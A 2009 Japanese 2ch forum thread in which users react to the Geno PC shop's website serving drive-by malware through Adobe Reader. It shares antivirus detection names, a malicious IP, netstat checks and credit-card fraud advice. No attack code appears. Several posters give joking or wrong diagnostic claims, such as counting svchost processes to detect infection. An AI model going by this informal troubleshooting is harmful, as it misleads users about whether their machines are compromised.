>>697 そういう感じです。
やっぱりCorei7だと重たい処理も多少は平気のようですねぇ。
挑戦してくださったことに感謝いたします。
712 :
PAC-3(兵庫県) :2009/04/05(日) 03:08:58.07 ID:bR9UnUxM
>>710 iriaでダウンロードして生成したファイルのタイムスタンプだから、どうだろう…
netstatで調べたらこんなん出るんですけどやばくないですか? UDP 127.0.0.1: 1033 (localhost: 1033) -> Sleipnir.exe(332) キンタマのポートのような
715 :
SM-3(青森県) :2009/04/05(日) 03:10:57.65 ID:uul5aBZ5
リカバリすればとりあえず安全なんでしょうか?
朝鮮のミサイル発射がされなかったのも発射管制システム(Windows98海賊版)がGenoでウイルス感染したからかもしれない
>>719 情報は取られた後の可能性があるので
パスワード暗証番号変更しといた方が。
722 :
PAC-3(東日本) :2009/04/05(日) 03:18:39.02 ID:WTQymExe
tvkでおっぱい
>>712 JS/WindowBomb.G トロイの木馬 接続が切断されました - 隔離しました
>>721 やっぱそうなんですか。
今再インストール終わった所で色々設定していまして
>>712 _____________
|| |
|| JS/WindowBomb.G |
|| ウイルスです? |
|| |
|l -――- |
'"´: : : : : : : : :`丶 |
':.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:ヽ______|
/.::.::./.::.::.::.:j.::.::.:|.:ム;ヘ.::.:ハ ̄ ̄ ̄ ̄ ̄
,'.::.::.::i.::.::.::.:/|.::.:: l/ `|.::./7
:.::.::.::j:|.:!.:_:/´|_.::_」 くV <|
|:ハ_::_ル'´ /⌒丶 j//V|
|:::::::::i x==ミ _ 〈/.:|.::|
|:::::::::i:'" ´ ゙̄Y}!.::.l.::|
八:::::::圦 、' _ "/_ノ.::,'.::j
/⌒ヽ::::ト{\ _,.ィ__/.::/l:./
/ 丶∧::| 丶 `ニ´ 彡// :厶|∧
{/ 丶ヘ| ノ / |:/ (こ ハ
/ }ヽ、 ∧ / 'x┴〈 }_ゝ、
/ \∨ ∨ / ニW } )
〈 _ノ∧ 厶=7 ,.-、) 人ノ
}⌒ヽ `<__,>イ |__ノ| |/∨
>>643 やればできるじゃないか粕www
俺もスキャンしててしばらく寝られないからもう少し相手するぞ
728 :
PAC-3(東京都) :2009/04/05(日) 03:24:21.33 ID:y8/YyQMp
ひでぇなこれ。カード情報送ってんじゃん。 まあ、俺はカード持ってないからいいんだけども。 前に打ったなんちゃってカード情報を送ろうとしてた。
a-squared 4.0.0.101 2009.04.03 Trojan-Spy.Agent!IK Avast 4.8.1335.0 2009.04.03 Win32:Daonol-L eSafe 7.0.17.0 2009.04.02 Suspicious File GData 19 2009.04.03 Win32:KillAV-KS Ikarus T3.1.1.49.0 2009.04.03 Trojan-Spy.Agent Kaspersky 7.0.0.125 2009.04.03 Backdoor.Win32.Agent.afhg McAfee+Artemis 5573 2009.04.03 Generic!Artemis Prevx1 V2 2009.04.03 High Risk Cloaked Malware Sophos 4.40.0 2009.04.03 Mal/Generic-A TrendMicro 8.700.0.1004 2009.04.03 PAK_Generic.001 AntiVirが対応してないだと・・・・? 一番更新早いベンダーってどこだっけ
730 :
SM-3(コネチカット州) :2009/04/05(日) 03:28:05.16 ID:uVA9mQjx
親のクレカ使用、ヤフオクも利用したばっかだとどんな危険性がある?踏んだからいまクリーンインスコしてるんだが
731 :
SM-3(埼玉県) :2009/04/05(日) 03:28:18.49 ID:cRdAG52H
いつでもレタスに文句言った奴はいないのかね 自分のPCでも重いってわかるだろうにね
734 :
PAC-3(千葉県) :2009/04/05(日) 03:34:35.15 ID:9Adf0bya
>>730 親がネラーでもないのに身に覚えがない●の購入費用で未来検索ブラジルから請求がきたりするかも知れないから、
この後の利用明細と請求元の確認は当面怠らないほうがいいと思うよ。
736 :
SM-3(アラバマ州) :2009/04/05(日) 03:36:21.57 ID:bgG3HYOY
739 :
PAC-3(北海道) :2009/04/05(日) 03:39:02.63 ID:zE4vGLsF
740 :
PAC-3(中国・四国) :2009/04/05(日) 03:40:39.58 ID:gzIeEji/
あっぶね このスレ見といて良かったわ
BGM自重w
744 :
SM-3(埼玉県) :2009/04/05(日) 03:43:11.36 ID:cRdAG52H
一二年前に掛川署のサイトでスレ立って、俺がレタス見たのはその時が初めてだったな。
746 :
SM-3(千葉県) :2009/04/05(日) 03:44:32.97 ID:r0EsZxgo
747 :
SM-3(福岡県) :2009/04/05(日) 03:45:11.44 ID:oHd+RwiM
>>735 の何が面白いんだと思ったら
おまえらquicktimeなんか入れてんのか
<EMBED src="song.mp3" autostart="true" hidden="true" loop="true"> 自動スタート・無限ループって怖くね?
749 :
SM-3(東京都) :2009/04/05(日) 03:49:16.92 ID:U+9KQ8za
Eee買おうかなと思ってたのにw
750 :
PAC-3(コネチカット州) :2009/04/05(日) 03:51:56.40 ID:uVA9mQjx
>>734 ●?未来検索ブラジル?よくわからないがありがとう。請求きたら無視でいいの?確実に悪用されるんじゃなくて悪用される可能性もあるってことだよね?
751 :
PAC-3(千葉県) :2009/04/05(日) 03:52:00.96 ID:9Adf0bya
>>748 反則だよねw
まだMIDIファイルエンドレス再生の方が良心的だわw
>>750 請求きたらカード会社に連絡。
不正に使われたって事でとめてもらわないと。
カード会社によっては、
手続きが面倒だったり、警察に届けなきゃいけなかったりする。
753 :
市民団体(神奈川県) :2009/04/05(日) 03:56:10.26 ID:2zKqovIi
またまたGeno祭w
754 :
PAC-3(千葉県) :2009/04/05(日) 03:56:28.98 ID:9Adf0bya
>>750 利用明細をチェックして買い物をしたことがない会社から請求があったら
即効でカード会社に連絡。
そうすればちゃんとカード会社で対処して金を銀行口座から引き落とされなくて済むようになる。
てか、名義人のパパにその辺の事情を正直に話して手続きしてもらいなさい。
まぁ、パパから説教されても仕方ないけどなw
つーか、子供は寝なさい。
755 :
遺憾の意(東京都) :2009/04/05(日) 03:59:21.17 ID:uDkcqBqD
まだ祭り終わってなかったんだ、秋葉の店頭で「放置してていいんですか?」 って教えてやったのに「はぁ?」って言われたぐらいだから無理かw
被害が出たらgeno訴えればいいの?
技術ない人が制作担当した代物に見えるんだが、 こういうのって簡単に直せるん?
ウィルスじゃなく、GENOのサイトのことね
759 :
PAC-3(大阪府) :2009/04/05(日) 04:06:04.88 ID:1UsvYM3t BE:1203525195-2BP(0)
760 :
SM-3(アラバマ州) :2009/04/05(日) 04:09:20.48 ID:hMcnOvMk
キーロガーだったら涙目な奴多そうだな
>>716 これOperaタンだと問題なくね?
CPUがQ9400メモリ6GOpera9.62
genoって普段でもやたら重かったりしたよな 今に始まった事じゃなかったりしてw
763 :
SM-3(コネチカット州) :2009/04/05(日) 04:11:53.41 ID:uVA9mQjx
>>752 >>754 ありがとう。とりあえず不正な請求は払わないで済むってことだよな。名義人に説明したいんだが入院中でw
764 :
PAC-3(千葉県) :2009/04/05(日) 04:14:43.59 ID:9Adf0bya
>>763 余談だけど、この種の手続きは名義人本人じゃないと出来ないんで、
不正請求が来た場合はいずれにしても入院患者に一働きしてもらわないと無理だぞw
765 :
市民団体(愛知県) :2009/04/05(日) 04:17:56.27 ID:cloa20iA
今ってまだGenoひらいたらやばいの?
766 :
PAC-3(アラバマ州) :2009/04/05(日) 04:18:05.54 ID:fZeQqQHh
foxit大勝利!!!!!!
今回のやつ踏んだらどんなウイルスにかかるわけでござんしょ。
768 :
SM-3(アラバマ州) :2009/04/05(日) 04:18:31.04 ID:hMcnOvMk
769 :
SM-3(アラバマ州) :2009/04/05(日) 04:19:52.06 ID:PS7K9zM5
PC我ぶっ壊れた
770 :
PAC-3(catv?) :2009/04/05(日) 04:19:54.12 ID:8f7V/n/a
735って何が問題なんだ? 普通の警察署しか表示されてないように見えるが
>>763 そもそも親子だろうと、自分以外の名義のクレカ使用は規約違反だよ。
クレカはカード会社から、名義人に貸与されているもの、所有権はカード会社が保有している。
不正請求があってカード会社に、連絡する時は名義人に電話さして使った人も名義人だったことにしないと
免責にならない可能性大だよ。
ウイルスに引っかかったのは、名義人以外にしても問題無いだろうけど。
772 :
市民団体(愛知県) :2009/04/05(日) 04:21:16.42 ID:cloa20iA
>>768 開いたけど超重くてブラウザ固まるwww
だましたなwwwww
773 :
PAC-3(東京都) :2009/04/05(日) 04:21:29.05 ID:Ts9d+0Ld
Janeのあぼーん詰め合わせパック更新してくれ
>>772 終わったなお前。タスクマネージャー開いてみろ
775 :
SM-3(アラバマ州) :2009/04/05(日) 04:25:13.89 ID:hMcnOvMk
776 :
PAC-3(東京都) :2009/04/05(日) 04:26:54.47 ID:y8/YyQMp
778 :
SM-3(埼玉県) :2009/04/05(日) 04:28:33.56 ID:cRdAG52H
779 :
PAC-3(千葉県) :2009/04/05(日) 04:29:18.58 ID:9Adf0bya
781 :
PAC-3(コネチカット州) :2009/04/05(日) 04:33:26.20 ID:uVA9mQjx
>>771 使ったのは入院する前に名義人が自分のPCを使ってクレカを使ってました。ヤフオクも入院する少し前に簡単決済で支払ってました。それでもアウトかな?
>>756 GENOが早いうちにお詫び掲載すれば許されるかも知れないけど
長期間放置してたら責任は逃れられないんじゃないか。
休みの日も毎日9時に更新もしているわけだし。
掲載しなかった場合が問題だな。
気付かないまま感染とかになってるユーザーが大変なことになりそう。
どっちにしろGENOは不正アクセスされたとかなら
警察に言わないといけないだろ。
言わなきゃ、完全にGENOの責任でいいよ。
785 :
PAC-3(千葉県) :2009/04/05(日) 04:42:51.00 ID:9Adf0bya
>>783 サイト開設してからの通算利用者数がどう少なく見積もっても5000名以上はいる筈なんで、
この種の問題の場合も正しく対処しないと最悪の場合、個人情報保護法違反で
Genoの運営管理者が書類送検されても仕方ないレベルだからね。
踏んでウィルス食らった連中でわざわざ集団訴訟を起こさなくても
警察から大目玉食らっちゃうレベル。
GENOは「何も起きてません」の一点張りだったりして 「何も起きてないので、何の責任もありません」とかw
>>781 それでいいけど、病院からでも名義人本人がクレカのデスクに電話しないとダメ、これ絶対。
バレないにしても、リスクを冒す必要はない。
ウイルスのこととクレカの番号が漏れた可能性が大きいから、クレカの番号を変更してくれと言えば大手のクレカなら変えてくれる。
もっと簡単に、クレカを紛失したと連絡すれば、現在のクレカが使用停止になり、新しい番号のクレカを送ってくれる。
ちなみに、何処のカード会社?
AntiVirユーザーがこの先生きのこるには・・・(´;ω;`)ブワッ
790 :
九条(コネチカット州) :2009/04/05(日) 04:46:04.65 ID:VnLOh5a1
1週間ほど前のTrueImageでのバックアップがあったんでひとまずその時点まで戻した ちょうどHDD換装したんでその際に使ったファイルだ まあそのHDDはgenoで買ったものなんだけどな
何も気にせずGENO見てたけどなんともなかったんだよなぁ ウイルス対策ソフトも入れてないし・・・ でもみんながヤバイ言ってるから今行く勇気ないしw
792 :
PAC-3(千葉県) :2009/04/05(日) 04:46:17.06 ID:9Adf0bya
>>786 そのときは岡ちゃんに一働きさせるだけw
793 :
PAC-3(東京都) :2009/04/05(日) 04:46:54.35 ID:y8/YyQMp
794 :
SM-3(アラバマ州) :2009/04/05(日) 04:48:02.40 ID:hMcnOvMk
>>789 だからavastとのデュアルエンジンにしておけとあれほど
>>795 imgタグじゃなくてiframeとかだろ
geno開いたら94.247.2.195に繋ごうとしてたから慌てて閉じたw
799 :
PAC-3(千葉県) :2009/04/05(日) 04:56:30.22 ID:9Adf0bya
>>797 タグ以前のレベルで
少なくても静岡県警のMP3ファイルなんかは
鯖の設定で別ドメインからリンクしてもまともに鳴らせない可能性もあるよ。
800 :
SM-3(コネチカット州) :2009/04/05(日) 05:00:31.57 ID:BoRRYifK
治らねえよ 頻繁にブラウザ落ちる
>>799 アザレアで実験してみようと思ったら、メアドもパスも忘れてたw
802 :
PAC-3(東京都) :2009/04/05(日) 05:04:02.13 ID:y8/YyQMp
やっとメインPCの入れなおしが終ったよ。 怖いよな。こういのって。
おいいまきたぞ 誰かまとめろ
804 :
遺憾の意(千葉県) :2009/04/05(日) 05:09:55.90 ID:SnwhNna0
とりあえずシステム復元したけど大丈夫かな
807 :
PAC-3(沖縄県) :2009/04/05(日) 05:13:37.53 ID:T45zXGyG
Adobe Readerを起動して[ファイル]から使用したpdfの履歴が見れるけど、 そこに覚えのないタイトルが無ければ大丈夫?
808 :
PAC-3(千葉県) :2009/04/05(日) 05:13:47.88 ID:9Adf0bya
どーでもいいけど、お日様があがったらウィルスよりも怖い テポドン3号が飛んでくるかも知れないんだから そろそろ寝た方がいいんじゃないの?w つーか、おいらは寝るw
>>808 おやすみ・・・永遠に(´;ω;`)ブワッ
811 :
PAC-3(東京都) :2009/04/05(日) 05:18:29.25 ID:y8/YyQMp
ちくしょう。怖くて他のスレでもリンク踏めないよw どうしてくれんだよ不能になっちまったよオレ。
813 :
九条(関東) :2009/04/05(日) 05:23:34.75 ID:9Z0awHK/
プニル2.8.4で踏んでしまった 開いてすぐ閉じたからアクロバットリーダーが勝手に開こうとしたかはわからない… ウイルスバスター2009入れてるけど、これって感染しちゃった?
815 :
市民団体(愛知県) :2009/04/05(日) 05:26:20.31 ID:cloa20iA
パソコン再起動したら起動しなくなったwww 今リカバリ中wwwwwwww ふざけんなよwwwwww
816 :
市民団体(愛知県) :2009/04/05(日) 05:27:44.78 ID:cloa20iA
>>774 そういやタスクマネージャ起動しなかったな
おかげでサブマシン死んだわwwwwくそがwwww
817 :
SM-3(埼玉県) :2009/04/05(日) 05:28:38.75 ID:cRdAG52H
愛知さんかっけー
818 :
PAC-3(神奈川県) :2009/04/05(日) 05:28:50.00 ID:nETFUjgp
>>813 重くなったのを感じたら駄目かも
acrobatの履歴か、neetstatコマンドか、どちらかで感染の確認できるかな?
どうなんでしょう、感染した人
821 :
市民団体(catv?) :2009/04/05(日) 05:33:39.61 ID:Y1iiHNKd
踏みたい!踏みてぇ!!!!!!!
822 :
市民団体(大阪府) :2009/04/05(日) 05:34:52.05 ID:DPeUBUZG
//www.geno-web.jp/MainMenu.html -- 「2009/04/05 0:37」のキャッシュをチェックしています。 -- 注意!アラートオープンを発見! (2) ブラクラチェックが終了しました。 ※ フォームタグを発見しました。(1) /4DCGI/Login ※ 隠しスクリプトを発見しました。(10) main_script.js //log3.recommender.jp/js/logrecom.js←こいつがやばいくさいな(危険素人はふむなよ) //www.geno.co.jp/4D/banner_koukoku.js 上記アドレスのチェックもお勧めします。(そのままチェックできます。)
>>821 こういう危険サイトで遊ぶときはvirtualboxとか仮想PCおすすめ
824 :
SM-3(愛知県) :2009/04/05(日) 05:38:40.72 ID:Vw4dvWvo
もしかしてkakikomi.txtも見られるかもしれないのか・・・?
>>820 neetstatw
常時waitだろw
826 :
九条(関東) :2009/04/05(日) 05:44:22.07 ID:9Z0awHK/
827 :
九条(関東) :2009/04/05(日) 05:47:28.17 ID:9Z0awHK/
>>798 さんが言っているような
アクセスしてるIPアドレスってどこから確認できるんでしょうか
829 :
遺憾の意(千葉県) :2009/04/05(日) 05:49:06.51 ID:SnwhNna0
もー怒った 岡ちゃんに通報してくる
>>823 サンクス。
今からVirtualPC2007入れて踏んじゃうよw
www.geno NGワード
このログ保存しとこ うぃるすこえー
833 :
市民団体(関東) :2009/04/05(日) 05:56:00.01 ID:OfyMbW56
ウイルスだと言われても ついurl踏みたくなる
ジェノ踏んじゃったんでconime.exe検索したら 作った覚えの無いCONIME.EXE-13EEEA1A.pfが昨日作成されてるな これはすぐ消そう
835 :
市民団体(愛知県) :2009/04/05(日) 06:00:19.51 ID:xGnk+A/c
836 :
九条(関東) :2009/04/05(日) 06:02:44.02 ID:9Z0awHK/
再起動したら重く無くなった どういう事だ…
837 :
SM-3(千葉県) :2009/04/05(日) 06:03:42.15 ID:r0EsZxgo
>>820 neetstatしたら、trueが返ってきたw
838 :
PAC-3(沖縄県) :2009/04/05(日) 06:05:21.63 ID:T45zXGyG
>>827 俺のバヤイはブラウザの左下のステータスで見た。(リンクにカーソル置いたらURLが表示されるトコ
genoのサイトが表示が遅かったので気づけた。
ところでカード決済はカード会社に頼めば海外からのは無効にできるとかあるのかな?
沖縄だし通販ないと不便極まりないよ!
気合入れてFireFoxで開いてみたらプラグインをインスコしないとすべてを表示できませんってでて 普通に重くなく見れるけどセーフだよな?
一時激重になったがブラウザ落ちたら特に変わったところないな 普通
841 :
PAC-3(北海道) :2009/04/05(日) 06:12:13.98 ID:aW41THsZ
adobe入れてないからセーフかな?
842 :
PAC-3(コネチカット州) :2009/04/05(日) 06:14:27.39 ID:uVA9mQjx
>>540 にSystem Idle ProcessがあってCPU喰いまくってたらやばいって書いてあるけど本当?クリーンインスコしてもかなりくってるよ
2ちゃんねるの情報なんて信じない方がいい。
844 :
SM-3(アラバマ州) :2009/04/05(日) 06:18:01.68 ID:hMcnOvMk
845 :
九条(関東) :2009/04/05(日) 06:20:41.70 ID:9Z0awHK/
>>838 なるほど。だとすると踏んだ時じゃないとわからないか…
netstatっての調べてコマンドプロンプトからやってみたんだけどわけわかめ
グローバルアドレスが2つほどあったからアクセスしようとしたら拒否された
後なんか送受信パケット数が少しずつ増え続けてるんだがなんだろこれ
846 :
市民団体(滋賀県) :2009/04/05(日) 06:25:33.93 ID:DoeXUfa6
アホばっかだな
847 :
SM-3(アラバマ州) :2009/04/05(日) 06:32:00.55 ID:hMcnOvMk
接続IP・ホストのモニタリングもできない奴が AVだけ入れてれば十分っしょwwwとかレスしてると思うと吐き気がする
adobeじゃなくてfoxitでいいじゃない
849 :
九条(群馬県) :2009/04/05(日) 06:41:29.79 ID:IhgO1ezG
メインブラウザLynxとChaliceでよかったw でもLynxだと注文出来ないんだよな…
850 :
PAC-3(東京都) :2009/04/05(日) 06:44:17.59 ID:/UzkD1Rb
なんでそこまでして注文したいんだ?w糞なショップなのにw
851 :
PAC-3(愛知県) :2009/04/05(日) 06:45:44.54 ID:Zk9fICxz
用も無いのにわざと接続してるやつも居るだろ
852 :
九条(群馬県) :2009/04/05(日) 06:48:35.73 ID:IhgO1ezG
まぁしないけどw そうけばLynx、PDF自動実行する設定にしてたわ。あぶな・・・
853 :
PAC-3(愛知県) :2009/04/05(日) 06:50:20.54 ID:FfceuxEy
なんかパスとか入力するとカーソルが一個前に動いて入力した文字が逆にならぶんだけど、 自動DL対策かと思ったらグーグルでもなった。これひょっとしたらウイルスかな?
854 :
九条(群馬県) :2009/04/05(日) 06:52:41.85 ID:IhgO1ezG
今見たらco.jpの方もやられてるのな。
ノート用DDRやHDDで色々買わせてもらってる 糞ショップとは言えないかな 個人的には無くなってほしくないかな オクぼったくりよりは全然いい まぁ社員乙とか言われるんだろうけど わざとウィルス仕込んだのなら別だが
ちょっと前に安物PCでスレ立っていたから 踏んだ奴多そうだな
こないだのNEC祭りで買えなかった厨が発狂したとかなの?
どう考えても放置し過ぎだよな もう通報しちゃったほうがいいんじゃない?
859 :
PAC-3(宮城県) :2009/04/05(日) 06:58:59.49 ID:ZWno05Ae
今踏んだらなんともなかったぞ
糞管理だからまた仕込まれるなw
862 :
PAC-3(愛知県) :2009/04/05(日) 07:05:35.28 ID:Zk9fICxz
>>860 まだだめじゃん
genoなら社員が仕込んだってこともありえそうだなw
863 :
九条(関東) :2009/04/05(日) 07:06:49.75 ID:9Z0awHK/
踏んだ人に聞きたいんだけど 再起動したら重いの無くなった?
864 :
PAC-3(群馬県) :2009/04/05(日) 07:07:10.70 ID:Ca48GkkG
今日の10時に電凸してみるか
ちくしょう!もうこんな所から買わないぞ! といってもSDカードしか買ったこと無いけど
866 :
九条(群馬県) :2009/04/05(日) 07:10:55.48 ID:IhgO1ezG
genoアウトレット Parse error: syntax error, unexpected T_VARIABLE in /home/lcvirtualdomain/geno.co.jp/htdocs/outlet/index.php on line1 なんて表示されるんだけど死んでる?
867 :
SM-3(東京都) :2009/04/05(日) 07:15:14.53 ID:GJ2bH2Uu
アキバが近所だから送料無料がないと絶対通販は使わないな
歩き回って最安探すの大変じゃん
やられた。 pdfは起動しなかったけどfox落ちた。 readerは9.0。
870 :
PAC-3(群馬県) :2009/04/05(日) 07:25:16.94 ID:Ca48GkkG
9.0もかよー
871 :
SM-3(アラバマ州) :2009/04/05(日) 07:35:08.71 ID:SEaREC9Q
ADOBE READER 9.1だがブラウザ落ちた とりあえず変なバッチファイルとかは作られていないようだが
2日にアクセスして特に不具合でてないんだけど大丈夫だよね?
873 :
九条(千葉県) :2009/04/05(日) 07:43:58.60 ID:ICQ6VfSj
これかよ 昨日からPCの調子が悪い IEが落ちる AVGがぶっ壊れた
874 :
PAC-3(東京都) :2009/04/05(日) 07:44:09.38 ID:y8/YyQMp
>>871 起動のときに重くなるからすぐ分かる。ならんのなら大丈夫だろ。
875 :
SM-3(アラバマ州) :2009/04/05(日) 07:47:59.41 ID:SEaREC9Q
>>874 >>1 の画像のとおりページファイル使用量が跳ね上がってブラウザが落ちたが
起動というのはどれの起動の事?
876 :
PAC-3(栃木県) :2009/04/05(日) 07:52:28.50 ID:V3xzTNi/
カスペは4月4日の朝の更新で対応しているようだな。
878 :
SM-3(アラバマ州) :2009/04/05(日) 07:54:30.27 ID:SEaREC9Q
セキュリティソフトが対応してない未知の脅威って 結構身近なところにあるもんだね 久々に恐怖を味わったよ
879 :
九条(群馬県) :2009/04/05(日) 07:54:35.39 ID:IhgO1ezG
>>872 大丈夫だと思うけど心配ならcmd.exeが起動してないかみてみたら?
880 :
SM-3(コネチカット州) :2009/04/05(日) 07:59:33.95 ID:uVA9mQjx
>>844 いまググったけどSystem Idle ProcessがCPU使用率一番高いのは当たり前なんだなw
>>540 てめえのせいでびびったじゃねーかwww
>>879 起動してなかった
朝起きてこれだから焦った これで飯食える
882 :
PAC-3(栃木県) :2009/04/05(日) 08:02:16.98 ID:V3xzTNi/
653 PAC-3(コネチカット州) New! 2009/04/05(日) 02:40:32.04 ID:uVA9mQjx[1回目]
アドビ9使ってノートンでスキャンしたけどクリーンインスコしとけば完全に安心だよな?クレカも使ってるしこのあいだもヤフオクしたしやばいかな?
682 PAC-3(コネチカット州) New! 2009/04/05(日) 02:48:55.46 ID:uVA9mQjx[2回目]
>>660 もうクリーンインスコしちゃったw環境とは?
730 SM-3(コネチカット州) New! 2009/04/05(日) 03:28:05.16 ID:uVA9mQjx[3回目]
親のクレカ使用、ヤフオクも利用したばっかだとどんな危険性がある?踏んだからいまクリーンインスコしてるんだが
781 PAC-3(コネチカット州) New! 2009/04/05(日) 04:33:26.20 ID:uVA9mQjx[6回目]
>>771 使ったのは入院する前に名義人が自分のPCを使ってクレカを使ってました。ヤフオクも入院する少し前に簡単決済で支払ってました。それでもアウトかな?
842 PAC-3(コネチカット州) New! 2009/04/05(日) 06:14:27.39 ID:uVA9mQjx[7回目]
>>540 にSystem Idle ProcessがあってCPU喰いまくってたらやばいって書いてあるけど本当?クリーンインスコしてもかなりくってるよ
880 SM-3(コネチカット州) New! 2009/04/05(日) 07:59:33.95 ID:uVA9mQjx[8回目]
>>844 いまググったけどSystem Idle ProcessがCPU使用率一番高いのは当たり前なんだなw
>>540 てめえのせいでびびったじゃねーかwww
883 :
PAC-3(愛知県) :2009/04/05(日) 08:05:22.71 ID:FfceuxEy
svchost.exeってのがいっぱい動いてるんだけど。これって普通?
884 :
SM-3(アラバマ州) :2009/04/05(日) 08:08:01.38 ID:SEaREC9Q
svchost.exeで検索して自分で判断して!
886 :
PAC-3(栃木県) :2009/04/05(日) 08:09:27.30 ID:V3xzTNi/
>>643 に書かれている対応ソフトを入れている。
netstatを実行して94.247.2.195に接続していない。
再起動直後にタスクマネージャーで
cmd.exe(コマンドプロンプト netstatを実行しようと自分で起動しているとか言うオチもある。だから再起動直後にw)
conime.exe(コマンドプロンプトでかなを使う時に常駐する奴だったと思う。)
が実行されていない
Genoにアクセスした記憶がない。
GenoにアクセスしたがAcrobat(Readerを含む)が起動した覚えがない(ブラウザがクラッシュした記憶がない)。
↑に数個当てはまるなら安全だろ。
>>883 6個以上は危険。
起動時から自動で何かマズいものが走ってる可能性が高い。
9.1でも検索しとけ。 確実に出てくる。
889 :
SM-3(埼玉県) :2009/04/05(日) 08:13:37.54 ID:KVAjhyIK
>>575 最近のウイルスって物理フォーマットまで壊すのか、すげえなw
つーかさ、スキャンがまだ終わらん。。。 もう寝ようかな。。 午後に買い物つきあわないかんし 全くGENOのおかげで全然寝られねーじゃんか、ふざけんなww
891 :
PAC-3(東京都) :2009/04/05(日) 08:18:13.00 ID:y8/YyQMp
>>889 ブートに寄生するタイプはむしろ古いタイプ。
よくわからんが、カスペ大勝利ってことでFA?
893 :
SM-3(長野県) :2009/04/05(日) 08:23:20.49 ID:D8haYVd3
NOD32 最強 伝説
avastでスキャン中でとりあえずCドライブは問題なしなんだけど この件に関して言えばCが問題なければ大丈夫だよね? スキャン放置してそろそろ寝ようと思うんだが。。。
895 :
遺憾の意(長屋) :2009/04/05(日) 08:27:59.50 ID:2LwETUQJ
いつでもレタスの推奨環境教えて
896 :
PAC-3(群馬県) :2009/04/05(日) 08:28:20.22 ID:Ca48GkkG
なんにも検出しないしリーダーも自動起動してないしU.batも検索してもないし・・・しかし不安だ・・・
中古PCとPCパーツに、ただ今無料でウィルスもお付けいたしております。
898 :
SM-3(長野県) :2009/04/05(日) 08:31:34.86 ID:D8haYVd3
>>10 FireFoxだと全部ページ読み込み終わればサクサクだけど
IEにエンジン切り替えた途端落ちた
899 :
SM-3(catv?) :2009/04/05(日) 08:31:38.44 ID:22RnhMbU
結局いつからウィルスまみれになってたかはまだわからない、でOK? 2日に覗いてんだけどアウトかな…
実行したスキャン ・ニフティのオンライン → 問題なし ・エフセキュアのオンライン → 問題なし ・ウイルスバスター → 問題なし ・今avastスキャン中 もう僕は寝ます お休みなさい。。。
902 :
PAC-3(東京都) :2009/04/05(日) 08:33:57.65 ID:y8/YyQMp
>>899 てめぇウイルス貼り付けるのも犯罪なのわかってんだろうな
絶対許さないからな。
903 :
SM-3(東京都) :2009/04/05(日) 08:34:00.52 ID:1y61zmZ1 BE:105009449-2BP(1030)
>>901 びびりすぎだろwww
ポート確認だけで十分だよ
904 :
SM-3(関西地方) :2009/04/05(日) 08:34:41.90 ID:JPcqsyiP
905 :
PAC-3(catv?) :2009/04/05(日) 08:35:19.56 ID:1I/DJK0+
こえーよ
906 :
市民団体(大阪府) :2009/04/05(日) 08:36:17.71 ID:DPeUBUZG
ν速民って情弱多すぎwwwwww おめえら二度と情弱者馬鹿にすんなよwwwww
最新版Avastでスキャンかけたら、Google Toolbarのフォルダの下のほうにルートキット?マルウェア?が 見つかったという警告が出ました。 なんじゃこりゃ。
909 :
PAC-3(愛知県) :2009/04/05(日) 08:38:36.50 ID:LGMPwLns
>>900 2日はニュー即でgenoスレ立ってて、そこそこ伸びてるし、
流石に、その日からウィルス貼られてるなら、とっくに報告あがってるだろ。
2chでの初の報告が土曜の午前だから、それ前後が怪しい。
実際はgenoの報告がくるまで分からないけど。
911 :
PAC-3(アラバマ州) :2009/04/05(日) 08:41:10.56 ID:GF02GznY BE:469793-PLT(14437)
普通に商品とか見れてるけどヤバイの?
912 :
遺憾の意(石川県) :2009/04/05(日) 08:42:16.76 ID:+9bjQsyQ
>>10 IEで見ると残り2500項目とか出てワロタ
そして残り2項目で落ちました
>>909 >実際はgenoの報告がくるまで分からないけど。
まぁそうなんだけど。でもありがd
うち帰ったら挙動チェクする。
914 :
PAC-3(catv?) :2009/04/05(日) 08:45:48.18 ID:1I/DJK0+
俺AVGだけだから怖くて観にいけない セキュリティに詳しいおまえら頼んだぞ
スキャン終わって正確な情報が出てきた。 ファイルの名前 C:\Program Files\Google\Google ToolbarNotifier\5.1.1309.3572\swg.dll\[Embedded_R#4a898] 結果 感染: Win32:Rootkit-gen [Rtk] オペレーション ファイルの削除に成功しました これは何? 不安何だ。誰か教えて?
916 :
SM-3(神奈川県) :2009/04/05(日) 08:47:00.91 ID:uXsT7mic
【客の返品】GENOを語るスレ29【オク出品】 これはmじなのかww?
917 :
PAC-3(群馬県) :2009/04/05(日) 08:47:38.74 ID:Ca48GkkG
403 名無しさん@編集中 sage New! 2009/04/05(日) 08:43:38 ID:P1DN6MoD hs.2-195.zlkon.lv [94.247.2.195] ラトビアだってw ここに繋げて何やってるんだろうね
>>10 Operaだと余裕だがIE死んだ
またしてもOpera最強伝説が実証されたと
919 :
市民団体(関東) :2009/04/05(日) 08:48:12.37 ID:5PfZkb8w
客の情報入ったパソコンでエロサイトにいったと つまりパソ屋なんてその程度なんだよ
920 :
PAC-3(catv?) :2009/04/05(日) 08:48:28.58 ID:1I/DJK0+
921 :
遺憾の意(千葉県) :2009/04/05(日) 08:50:08.29 ID:SnwhNna0
ウィルススキャンやっと終わった 次はブートタイム検査だ
922 :
市民団体(愛知県) :2009/04/05(日) 08:50:47.31 ID:cloa20iA
ウインドウズが起動しなくなってしまった 窓の画像出て読み込んでるところまでは行くんだが もうどうしようもないのかこれ
923 :
PAC-3(群馬県) :2009/04/05(日) 08:51:48.99 ID:Ca48GkkG
おはよう まだHPはそのままなのかな。
925 :
PAC-3(アラバマ州) :2009/04/05(日) 08:59:24.83 ID:GF02GznY BE:418346-PLT(14437)
926 :
SM-3(長野県) :2009/04/05(日) 09:00:25.13 ID:D8haYVd3
927 :
SM-3(アラバマ州) :2009/04/05(日) 09:02:03.84 ID:N2MR8xX/
すげー美人 すげーイケメン
今さっき踏んだんだが、ブラウザが落ちたり重くなったりという事はないし 最新バージョンのAvastも無反応だったんだが、大丈夫なのかね?
var _uacct=""; // set up the Urchin Account urchin [名] 1 ((古風))いたずらっ子, わんぱく小僧, (一般に)男の子, 少年. 2 =sea urchin. [ラテン語ricius(ハリネズミ)] 別に大して悪質じゃ無い気もするけど
ならエイプリルフールの残り火でしょ。
>>931 そう見せかけて、鯖のデータ引っこ抜くのが
目的ですよ
10時まで放置のつもりか?
935 :
PAC-3(神奈川県) :2009/04/05(日) 09:32:33.01 ID:nETFUjgp
936 :
PAC-3(長屋) :2009/04/05(日) 09:32:34.77 ID:uFWmaItI
一夜明けたけどどうなった?
